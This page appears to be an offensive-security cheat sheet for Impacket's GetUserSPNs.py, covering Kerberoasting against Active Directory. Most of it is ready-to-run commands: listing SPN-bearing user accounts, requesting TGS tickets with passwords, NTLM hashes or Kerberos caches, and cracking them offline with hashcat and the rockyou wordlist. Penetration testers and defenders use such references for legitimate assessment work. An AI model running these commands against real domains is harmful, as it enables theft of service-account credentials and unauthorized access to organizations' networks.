GetUserSPNs

Description

This module will try to find Service Principal Names that are associated with normal user account. Since normal account's password tend to be shorter than machine accounts, and knowing that a TGS request will encrypt the ticket with the account the SPN is running under, this could be used for an offline bruteforcing attack of the SPNs account NTLM hash if we can gather valid TGS for those SPNs.

Usage

Get a list of a user's SPNsRequest TGS for a userRequest TGS for users in a file

GetUserSPNs.py -dc-ip 10.10.10.10 qu35t.pw/svc_user:password

GetUserSPNs.py -dc-ip 10.10.10.10 qu35t.pw/svc_user:password -request

GetUserSPNs.py -usersfile users.txt -no-pass -dc-ip 10.10.10.10 qu35t.pw/

Authentication

NTLM hashesNo PassUsing Kerberos

GetUserSPNs.py -hashes LMHASH:NTHASH -dc-ip 10.10.10.10 qu35t.pw/svc_user

GetUserSPNs.py -dc-ip 10.10.10.10 -no-pass qu35t.pw/svc_user

export KRB5CCNAME=svc_user.ccache
GetUserSPNs.py -k -no-pass -dc-host dc1.qu35t.pw qu35t.pw/svc_user

Hashcat Cracking

hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

References

• Impacket Github
• Hackndo - Service Principal Name (SPN)
• Ippsec - Scrambled
• Ippsec - Search
• Ippsec - Active